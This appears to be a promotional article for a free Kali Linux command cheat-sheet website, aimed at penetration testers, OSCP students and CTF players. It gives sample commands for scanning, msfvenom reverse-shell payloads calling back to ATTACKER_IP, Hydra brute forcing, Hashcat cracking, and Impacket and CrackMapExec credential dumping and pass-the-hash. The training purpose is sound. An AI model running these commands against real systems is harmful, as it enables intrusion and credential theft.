Kali Linux Commands Cheat Sheet 2026 — 150 Tools, 2955 Commands, One Click

Kali Linux commands cheat sheet 2026 — there is exactly one moment every penetration tester, CTF player, and security student has experienced: you are mid-test, you know the tool you need, but you cannot remember the exact flag combination for the specific task in front of you. You open a new tab, type the tool name into Google, wait for a result, get served a 2019 blog post with three commands and a lot of filler text, and lose five minutes you did not have. That problem is what the SecurityElites Kali Linux Commands reference was built to solve. 150 tools. 2,955 commands. Thirteen categories. One-click copy. Zero signup. Open it once and you will understand immediately.

🎯 What This Guide Covers

A full walkthrough of the SecurityElites Kali Linux Commands cheat sheet interface
How to navigate all 13 categories and 150 tools efficiently
The most valuable commands in each category that professional testers use most
How to integrate the cheat sheet into OSCP, CTF, and real engagement workflows
Pro tips for getting the most out of the one-click copy and category filter system

⏱️ 45 min read · 3 exercises · tool open by end

📊 What is your biggest frustration with Kali Linux command references?




✅ All four of those frustrations were the design brief for this tool. Browser-native, one-click copy (no PDF formatting issues), 150 tools (not just the famous 10), and a single URL to bookmark. Let’s walk through exactly how it works.

The Kali Linux Commands cheat sheet at securityelites.com/tools/kali-linux-commands/ sits alongside the 180-Day Kali Linux Mastery Course as a reference layer — the course teaches you how and why each tool works, the cheat sheet gives you instant command recall during the sessions where you actually need it. Both are free, both work together, and you need both.


What the SecurityElites Kali Linux Commands Cheat Sheet Actually Contains

Most “Kali Linux cheat sheets” that appear in Google results contain 15 to 30 tools and were written in 2020. They cover Nmap, Metasploit, Hydra, and a handful of other tools that every beginner already knows. They miss the 120 tools that professional penetration testers actually use for the full engagement lifecycle — the ones where you spend 10 minutes searching for the right flag syntax because nobody covers them.

The SecurityElites Kali Linux Commands reference was built differently. It starts from the complete Kali Linux toolset and selects the 150 tools that appear most frequently in real penetration testing engagements, bug bounty workflows, OSCP lab work, and CTF competitions. For each tool, it contains every command variant a professional would actually use — not just the introductory one-liner, but the full range from basic discovery through advanced flag combinations used in real assessments.

150 Tools — 13 Category Breakdown
Recon (22 tools): Nmap · Masscan · RustScan · Amass · Subfinder · DNSrecon · theHarvester · Nuclei · httpx
Web App (27 tools): Burp Suite · SQLMap · Nikto · ffuf · Gobuster · WPScan · feroxbuster · katana · ZAP
Exploitation (11 tools): Metasploit · msfvenom · searchsploit · BeEF-XSS · RouterSploit · Sliver
Password (10 tools): Hydra · Hashcat · John · Medusa · Crunch · CeWL · CUPP
Wireless (10 tools): Aircrack-ng · Wifite · Kismet · Reaver · Bettercap
Post-Exploit (10 tools): Mimikatz · BloodHound · Evil-WinRM · Impacket · CrackMapExec
OSINT (13 tools): Maltego · Shodan · SpiderFoot · Recon-ng · theHarvester
Sniffing (9 tools): Wireshark · tcpdump · Ettercap · Bettercap · Responder
Active Dir (9 tools): BloodHound · Impacket · CrackMapExec · Rubeus · Kerbrute
Plus: Vuln Assessment (11) · Forensics (11) · Crypto (5) · Network (2)

📸 SecurityElites Kali Linux Commands — 150 tools across 13 categories. Recon has 22 tools; Web App is the largest category at 27. Active Directory and Post-Exploitation cover the full modern AD attack stack.


Interface Walkthrough — Categories, Filters and One-Click Copy

The tool loads at securityelites.com/tools/kali-linux-commands/ with zero page load overhead — no account, no cookie consent wall, no email gate. The interface has three zones: the category filter bar at the top, the tool list on the left, and the command display panel on the right.

The category filter bar contains 14 pills: All (150 tools) plus the 13 category names. Clicking a category pill immediately filters the tool list on the left to only show tools in that category. The tool count updates in real time — clicking Recon shows 22 tools, Web App shows 27. This is the fastest way to navigate when you know the category but not the specific tool name.

The tool list on the left is a scrollable panel of tool names. Clicking any tool name loads all commands for that tool in the main display panel. The display panel shows each command on its own row with a description of what it does and a Copy button aligned to the right. Clicking Copy copies the complete command string to your clipboard with the correct syntax, flags, and spacing preserved exactly as written — no PDF rendering artefacts, no line break corruption.

🛠️ EXERCISE 1 — BROWSER (10 MIN · NO INSTALL)
Open the Cheat Sheet and Complete a Full Tool Exploration Across 3 Categories

⏱️ Time: 10 minutes · Browser only · no account required

Step 1: Open the tool in a new tab:
securityelites.com/tools/kali-linux-commands/

Step 2: Note the stats at the top:
– How many tools total?
– How many commands total?
– How many categories?

Step 3: Click the “Recon” category pill
– How many tools are listed?
– Click “Nmap” — how many Nmap commands are shown?
– Find the command for a full service version scan
with OS detection and default scripts
– Click Copy on that command

Step 4: Click the “Web App” category pill
– Click “SQLMap” in the tool list
– Find the command for dumping a specific database table
– Copy it

Step 5: Click the “Active Dir” category pill
– Click “BloodHound” or “CrackMapExec”
– Find a lateral movement or credential spray command
– Copy it

Step 6: Click “All (150)” to return to the full tool list
– Use the tool search/filter to find “Hashcat”
– How many Hashcat commands are available?
– Find the command for cracking NTLM hashes (mode 1000)

Step 7: Bookmark the tool URL for instant access during
your next CTF, OSCP lab session, or test engagement

✅ What you just learned: The three-click workflow — Category → Tool → Copy — gets you any command in the entire 150-tool database in under 5 seconds. The category filter is the key efficiency gain over searching individual tool man pages: if you know you are in the web application phase, clicking Web App shows all 27 relevant tools in one panel. The bookmark in Step 7 is the most important action — this tool replaces a folder full of cheat sheet PDFs and a dozen open browser tabs during testing sessions.

📸 Screenshot the tool open with a command copied and share in #kali-commands on Discord.


Recon and Web App Categories — The 49 Tools You Use Most

The Recon category is where every engagement starts. Twenty-two tools covering the full reconnaissance spectrum — from initial host discovery with Netdiscover and Nmap through subdomain enumeration with Amass and Subfinder, DNS intelligence with DNSrecon and dnsx, web content discovery with httpx and EyeWitness, and automated vulnerability detection with Nuclei. For a category that contains the foundation of every assessment, having all 22 tools with their full command sets in one panel eliminates the context switching that breaks focus during recon phases.

The most commonly referenced commands in the Recon category during professional assessments are the Nmap combination flags. The classic service scan — nmap -sV -sC -p- --open TARGET — appears in every pentest report preamble, but the tool contains the full range beyond the basics: NSE script categories, timing templates, output formats for all four file types, and the specific flag combinations for OSCP-style enumeration methodology. If you have ever spent 90 seconds trying to remember whether it is -oA or -oN for saving output, those 90 seconds are gone with one click.

SAMPLE COMMANDS AVAILABLE IN THE TOOL — RECON CATEGORY
# Nmap — these are in the tool, each with one-click copy:
nmap -sV -sC -p- --open -oN full_scan.txt TARGET
nmap -sU --top-ports 200 TARGET
nmap --script vuln -p 80,443,8080 TARGET
# Subfinder — subdomain enumeration
subfinder -d target.com -all -recursive -o subs.txt
# httpx — probe subdomains for live hosts
httpx -l subs.txt -title -status-code -tech-detect -o live.txt
# Nuclei — template-based vulnerability scanning
nuclei -l live.txt -t exposures/ -severity critical,high -o nuclei.txt
# RustScan — fast port scanning before full Nmap
rustscan -a TARGET --ulimit 5000 -- -sV -sC

The Web App category is the largest at 27 tools — reflecting the reality that web application testing now constitutes the majority of both bug bounty work and external penetration testing engagements. Burp Suite commands cover proxy configuration, Intruder attack types, and the Turbo Intruder integration that Day 16 of the Bug Bounty course covered. SQLMap commands span the full injection methodology from detection flags through database enumeration and data dumping with WAF bypass tamper scripts included. The directory busting trio — Gobuster, ffuf, and Feroxbuster — each have multiple command variants covering different wordlist strategies, extension filtering, and output formats.


Exploitation, Password and Wireless — Attack Phase Commands

The Exploitation category covers 11 tools and represents the phase most learners focus on first but actually use least in professional assessments — because most real-world engagements do not reach the point of running Metasploit exploits. Understanding the exploitation tools in context means knowing when to use them versus manual exploitation approaches. The cheat sheet includes full Metasploit module workflow commands, msfvenom payload generation for all major platforms including PHP, ASP, Python, PowerShell, and ELF, and searchsploit query syntax for finding applicable exploits from the offline ExploitDB database during network-restricted engagements like OSCP.

The Password category is where the cheat sheet saves the most time during actual testing. Hydra’s flag syntax — particularly the service-specific format differences between HTTP form attacks, SSH, FTP, and SMB — is genuinely difficult to remember without reference. The difference between http-post-form and http-form-post, the exact format of the colon-separated field string, and the success/failure string syntax are all present in the tool with working examples. Hashcat mode numbers are similarly reference-heavy: mode 0 for MD5, 100 for SHA1, 1000 for NTLM, 1800 for SHA-512crypt, 13100 for Kerberoast — the tool lists all major hash modes with their corresponding numbers.

SAMPLE COMMANDS — EXPLOITATION AND PASSWORD CATEGORIES
# msfvenom — PHP reverse shell payload generation
msfvenom -p php/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f raw > shell.php
# msfvenom — Windows executable payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o payload.exe
# Hydra — HTTP POST form brute force
hydra -L users.txt -P passwords.txt TARGET http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials"
# Hashcat — NTLM hashes (mode 1000); --show prints entries already cracked and stored in the potfile
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --show
# Hashcat — Kerberoast TGS ticket cracking (mode 13100)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
# searchsploit — find exploits for a specific service version
searchsploit "Apache 2.4" --www


Post-Exploitation, Active Directory and OSINT — Advanced Phases

The Post-Exploitation and Active Directory categories are where the cheat sheet most significantly outperforms every other free command reference. There is almost no comprehensive free resource that covers Impacket’s full suite — psexec, wmiexec, smbexec, secretsdump, GetNPUsers, GetUserSPNs — with working command syntax and the correct credential format variations for hash-only attacks. The SecurityElites cheat sheet covers all of them across the Post-Exploitation and Active Directory categories, making it the go-to reference during the AD attack phases covered in Days 23–50 of the Ethical Hacking course.

BloodHound’s Python-based data collection commands, the Cypher query syntax for finding attack paths, and the command-line flags for CrackMapExec’s various execution modes are all present. Rubeus commands for Kerberoasting, AS-REP roasting, and ticket manipulation round out the Kerberos attack coverage. For OSCP students doing the Active Directory sets, having every Impacket and CrackMapExec command available in one browser tab is a significant time saver during timed exam conditions.

SAMPLE COMMANDS — ACTIVE DIRECTORY AND POST-EXPLOITATION
# Impacket — remote credential dump
impacket-secretsdump DOMAIN/USER:PASS@TARGET_IP
# Impacket — Kerberoasting (find SPNs and request tickets)
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
# Impacket — AS-REP roasting (no pre-auth users)
impacket-GetNPUsers DOMAIN/ -dc-ip DC_IP -usersfile users.txt -format hashcat -outputfile asreproast.txt
# CrackMapExec — SMB credential testing across subnet
crackmapexec smb 192.168.1.0/24 -u administrator -H :NTLM_HASH --local-auth
# Evil-WinRM — interactive PS session with hash
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
# BloodHound Python — collect AD data from Kali
bloodhound-python -d DOMAIN -u USER -p PASS -dc DC_IP -c All --zip

The OSINT category covers 13 tools including Maltego, Shodan CLI, SpiderFoot, Recon-ng, theHarvester, Amass OSINT mode, and the crt.sh curl commands that pull certificate transparency data without a web interface. The sniffing category covers Wireshark display filter syntax — one of the most referenced but least memorisable command sets in all of Kali — alongside tcpdump capture filters, Responder configuration, and Bettercap network manipulation commands.

🧠 EXERCISE 2 — THINK LIKE A HACKER (10 MIN · NO TOOLS)
Map the Right Cheat Sheet Category to Each Phase of a Real Penetration Test

⏱️ Time: 10 minutes · No tools required

You are conducting an external penetration test against a
mid-sized company. You have the target domain: company.com
and permission to test all internet-facing infrastructure.

Map each phase below to the correct category in the cheat sheet
AND name one specific tool from that category you would use:

PHASE 1: Discover all internet-facing IPs and subdomains
→ Category: ___ | Tool: ___

PHASE 2: Identify web technologies and check for live web apps
→ Category: ___ | Tool: ___

PHASE 3: Directory brute force a login portal found on port 8443
→ Category: ___ | Tool: ___

PHASE 4: Test the login portal for SQL injection
→ Category: ___ | Tool: ___

PHASE 5: You found default credentials. Capture the WPA2 key
from a wireless access point found during physical recon
→ Category: ___ | Tool: ___

PHASE 6: You have a low-priv shell. Extract password hashes
→ Category: ___ | Tool: ___

PHASE 7: Crack the extracted NTLM hashes offline
→ Category: ___ | Tool: ___

PHASE 8: Use hashes to move laterally to the Domain Controller
→ Category: ___ | Tool: ___

For each phase — open the cheat sheet and verify which specific
command you would use. Can you find it in under 10 seconds?

✅ What you just learned: The eight-phase mapping exercise makes the category system intuitive by connecting abstract categories to real assessment phases. Phase 1=Recon (Subfinder/Amass), Phase 2=Recon (httpx/EyeWitness), Phase 3=Web App (ffuf/Gobuster), Phase 4=Web App (SQLMap), Phase 5=Wireless (Aircrack-ng/Wifite), Phase 6=Post-Exploit (Impacket secretsdump), Phase 7=Password (Hashcat), Phase 8=Active Dir (CrackMapExec/Evil-WinRM). Once you map assessment phases to categories, the cheat sheet navigation becomes instinctive — you click the category for your current phase, not the category for a specific tool name.

📸 Write your completed phase mapping and share in #kali-commands on Discord.


How to Integrate the Cheat Sheet Into OSCP, CTF and Real Engagements

The cheat sheet is not a learning tool — it is a recall tool. The difference matters for how you use it. You should not be reading the cheat sheet to understand what a tool does. You should be opening it when you know exactly what you need but cannot remember the precise syntax. The workflow for each scenario type is different.

For OSCP lab work: Keep the cheat sheet open in a dedicated browser tab throughout every lab session. The OSCP exam’s 23-hour time pressure punishes the 90-second searches for flag syntax. Before each tool you intend to use, spend 30 seconds reviewing its commands in the cheat sheet — this primes your memory and ensures you are using the most appropriate flags for your specific objective. The Active Directory and Post-Exploitation categories are especially valuable during the AD set machines where you cycle through multiple Impacket tools in sequence.

For CTF competitions: CTFs introduce novel challenges but always use standard tools. The cheat sheet’s 13-category structure matches the CTF challenge categories — web exploitation aligns with Web App, crypto challenges align with the Crypto category, forensics challenges align with Volatility and Autopsy commands in the Forensics category. During timed CTF events, having the copy functionality means you can run commands from the reference without retyping — reducing typo-related wasted time.

For bug bounty recon: The Recon and OSINT categories together give you the complete automated recon pipeline. The cheat sheet contains the exact Subfinder, httpx, Nuclei, and gau command chains that feed into a professional bug bounty recon workflow. Copy the commands in sequence, substitute your target domain, and run them in parallel terminal windows without stopping to look up any syntax.

For professional engagements: The most valuable professional use of the cheat sheet is pre-engagement preparation. Before connecting to a client network, spend 15 minutes reviewing the categories relevant to the scope — if it is an AD engagement, review the Active Directory and Post-Exploitation categories and have the key commands bookmarked. This replaces the “notebook of notes” that experienced testers carry — and unlike a handwritten notebook, the one-click copy means zero transcription errors when running commands against live infrastructure.

🛠️ EXERCISE 3 — BROWSER ADVANCED (15 MIN)
Build Your Personal Quick-Access Command Set From the Cheat Sheet

⏱️ Time: 15 minutes · Browser · text editor

Open securityelites.com/tools/kali-linux-commands/ and
build a personal “Day 1 Recon” command file — the first 15
commands you run when starting any new target.

Step 1: Click Recon category
Step 2: For each tool below, find your preferred command
and paste it into a text file:

TOOL → COMMAND TYPE TO FIND
Nmap → Full TCP port scan + service detection
RustScan → Fast initial scan feeding into Nmap
Subfinder → All-source subdomain enumeration
Amass → Passive subdomain enumeration
httpx → Probe live subdomains with tech detect
DNSrecon → Zone transfer attempt + A record enum
theHarvester → Email + subdomain OSINT
EyeWitness → Screenshot web apps from URL list
Nuclei → Fast vuln scan against live targets

Step 3: Click Web App category — add these:
Gobuster → Directory brute force on live hosts
ffuf → VHOST discovery
Nikto → Web server vulnerability scan

Step 4: Save your personal “Day 1 Recon” command file with
TARGET placeholder substituted

Step 5: Time yourself: how long did it take to assemble
these 12 commands from the cheat sheet?
Compare that to assembling them from man pages.

Bonus: Add 3 commands from the OSINT category for passive
recon before any active scanning begins.

✅ What you just learned: Building your personal command workflow from the cheat sheet turns a reference tool into an operational asset. The “Day 1 Recon” file you just built is a reusable script template — substitute TARGET on the first use and it becomes your standard opening recon sequence for every engagement. The time comparison (Step 5) usually shows 3–8 minutes from the cheat sheet vs 30–45 minutes from man pages and Google. That time difference, multiplied across every assessment, is the productivity case for keeping the cheat sheet open in every testing session.
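A pre-flight check for a saved command file such as the "Day 1 Recon" file, added here as an example and not part of the SecurityElites tool: it flags typographic corruption (en/em dashes standing in for `--`, curly quotes, non-breaking spaces) and placeholders that were never substituted, so nothing malformed is run against live infrastructure. The placeholder list, function names and sample file are assumptions made for this example.

```python
import re
import unicodedata

# Characters that CMS editors, PDFs and word processors substitute for ASCII.
# Pasted into a shell, each one changes or breaks the command.
TYPOGRAPHIC = {
    "\u2013": "--",  # en dash, most often a mangled "--"
    "\u2014": "--",  # em dash, most often a mangled " -- "
    "\u2212": "-",   # minus sign
    "\u201c": '"', "\u201d": '"',  # curly double quotes
    "\u2018": "'", "\u2019": "'",  # curly single quotes
    "\u00a0": " ",   # non-breaking space
}

# Placeholder tokens as used in this page's sample commands (assumed list).
# Hydra's ^USER^ / ^PASS^ markers are real syntax, so tokens wrapped in
# carets are deliberately not reported.
PLACEHOLDER = re.compile(
    r"(?<![\^\w])(?:TARGET(?:_IP)?|ATTACKER_IP|DC_IP|NTLM_HASH|"
    r"DOMAIN|USER|PASS|IP)(?![\^\w])")


def lint_line(line):
    """Return (kind, detail) findings for a single command line."""
    findings = []
    for ch in sorted(TYPOGRAPHIC.keys() & set(line)):
        name = unicodedata.name(ch)
        findings.append(("typographic", f"U+{ord(ch):04X} {name}"))
    for match in PLACEHOLDER.finditer(line):
        findings.append(("placeholder", match.group(0)))
    return findings


def is_command(raw):
    """Blank lines and # comments are notes, not commands."""
    stripped = raw.strip()
    return bool(stripped) and not stripped.startswith("#")


def lint_commands(text):
    """Lint every command line; returns (lineno, kind, detail) tuples."""
    report = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if is_command(raw):
            report += [(lineno, k, d) for k, d in lint_line(raw.strip())]
    return report


def repair(line):
    """Map typographic characters back to their likely ASCII originals."""
    return line.translate(str.maketrans(TYPOGRAPHIC))


def repair_commands(text):
    """Repair command lines only; comments keep their punctuation."""
    lines = [repair(r) if is_command(r) else r for r in text.splitlines()]
    return "\n".join(lines) + "\n"


# Constructed sample: a command file pasted from a page that rewrote "--".
SAMPLE = """\
# Day 1 Recon (constructed sample)
nmap -sV -sC -p- \u2013open -oN full_scan.txt TARGET
subfinder -d lab.example -all -recursive -o subs.txt
rustscan -a 10.10.10.5 \u2013ulimit 5000 \u2014 -sV -sC
searchsploit \u201cApache 2.4\u201d \u2013www
"""

if __name__ == "__main__":
    for lineno, kind, detail in lint_commands(SAMPLE):
        print(f"line {lineno}: {kind}: {detail}")
    print(repair_commands(SAMPLE), end="")
```

The repair step is a best guess at the original characters, so review the repaired file before use; placeholders are only reported, never filled in.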

📸 Screenshot your completed “Day 1 Recon” command file and share in #kali-commands on Discord. Tag #kalicommands2026

🧠 QUICK CHECK — Kali Linux Commands Cheat Sheet

You need to crack a set of Kerberoasted TGS tickets you extracted during an AD assessment. You know Hashcat is the tool but cannot remember the mode number for Kerberos 5 TGS-REP etype 23. What is the fastest way to find the correct command?



🔖 The SecurityElites Kali Linux Commands Tool — At a Glance

URL: securityelites.com/tools/kali-linux-commands/ — bookmark this now
150 tools: Every major Kali Linux penetration testing tool across the full assessment lifecycle
2,955+ commands: Not just one-liners — full flag variations for real assessment scenarios
13 categories: Recon · Web App · Exploit · Password · Wireless · Post-Exploit · OSINT · Sniffing · Vuln Assess · Forensics · Crypto · Active Dir · Network
One-click copy: Exact command syntax copied to clipboard — no PDF formatting corruption
Free · No signup: Open in browser, start using immediately — zero barriers
Mobile-responsive: Works on phone and tablet — reference commands during tests away from your main machine

❓ Frequently Asked Questions

How many tools and commands does the SecurityElites Kali Linux cheat sheet cover?
150 tools and 2,955+ commands across 13 categories. Recon has 22 tools, Web App has 27 (the largest category), and every major phase of penetration testing is covered including Active Directory, Post-Exploitation, and forensics tools not found in most other free references.
Is the Kali Linux commands cheat sheet free?
Completely free with no account or email required. Navigate to securityelites.com/tools/kali-linux-commands/ and the full tool loads immediately with all categories, filters, tool selection, and one-click copy available instantly.
What categories does the Kali Linux cheat sheet cover?
13 categories: Recon (22 tools including Nmap, Subfinder, Nuclei), Web App (27 tools including Burp Suite, SQLMap, ffuf), Exploitation (11 tools including Metasploit, msfvenom), Password Attacks (10 tools including Hashcat, Hydra), Wireless, Post-Exploitation, OSINT, Sniffing, Vulnerability Assessment, Forensics, Cryptography, Active Directory, and Network.
Can I use this cheat sheet on mobile?
Yes — fully mobile-responsive. All category filters, tool selection, command display, and one-click copy work on mobile browsers. Useful during CTFs and field engagements where you need a command reference without opening a laptop.
Is this cheat sheet suitable for OSCP preparation?
Yes — it covers all OSCP-relevant tools: Nmap enumeration syntax, Gobuster/ffuf for web content discovery, SQLMap for injection, Hydra and Hashcat for credential attacks, Metasploit for exploitation, and the full Impacket/CrackMapExec/BloodHound stack for the Active Directory exam sets.
How often is the Kali Linux commands cheat sheet updated?
Updated as Kali rolls new tool versions and as modern tool workflows evolve. Recent additions include Go-based recon tools (httpx, dnsx, nuclei), modern AD attack tools (BloodHound Python, NetExec), and cloud security tools. Check the live tool for the current command set.
📚 Further Reading

  • Kali Linux Commands Cheat Sheet — The Tool — The tool this article is about — open it directly, bookmark it, and keep it in every testing session. 150 tools, 2,955+ commands, free, one-click copy.
  • Kali Linux Post Installation Steps 2026 — Before using the commands cheat sheet, make sure your Kali environment is properly configured — all 15 post-installation steps that ensure every tool in the reference actually works when you run it.
  • 180-Day Kali Linux Mastery Course — The course that teaches you why every command in the cheat sheet works — use both together: the course for understanding, the cheat sheet for recall during active testing sessions.
  • How to Set Up a Hacking Lab 2026 — The lab environment where you practice every command in the cheat sheet — Kali Linux, Metasploitable 2, and DVWA on an isolated VirtualBox network, free to build on any hardware.
  • Kali Linux Official Tool Documentation — The official Kali Linux tool index with individual documentation pages for every tool in the distribution — use alongside the SecurityElites cheat sheet when you need deeper parameter explanations.
Mr Elite
Owner, SecurityElites.com
I built the Kali Linux Commands cheat sheet because I got tired of the same problem on every single engagement. Mid-test, I knew what tool I needed, I knew roughly what I wanted it to do, and I wasted three to seven minutes searching for the exact syntax every time. My notes were scattered across text files, my PDF cheat sheets had line breaks in the wrong places when I copied from them, and the tool-specific man pages buried the commands I needed under 300 lines of rarely-used flags. The cheat sheet started as a personal file I kept updated for my own use. When I put it online the first time, people spent three months telling me to add more tools. I added more tools. Then more. Then reorganised it into categories. Then built the filter and copy system. The version that is live now is the tool I wish had existed when I started. 150 tools, 2,955 commands, one click. Open it. Bookmark it. Keep it open during every test you run.
